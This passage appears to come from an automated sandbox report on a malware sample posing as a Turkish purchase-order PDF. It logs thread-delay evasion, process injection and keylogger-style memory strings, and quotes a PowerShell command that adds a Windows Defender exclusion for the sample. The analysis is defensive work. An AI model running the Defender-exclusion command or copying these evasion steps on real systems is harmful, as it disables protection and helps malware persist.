                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396046Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395827Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395714Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395587Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395465Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395358Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395250Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395140Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395031Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394922Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394812Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394703Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394593Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394483Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398747Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398560Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396684Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396577Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396244Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396133Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399778
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399349
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399224
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399094
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398747
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397052
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396359
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396250
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396141
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396031
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395593
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395042
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394825
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394541
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394437
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394218
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1318702019.0000000000A92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2548739831.0000000006030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory written: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q9<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}rTH
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q?<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}r{Win}rTH
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q3<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q><b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}r{Win}TH
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 07/19/2024 18:06:08<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}r{Win}r
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q8<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}TH
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
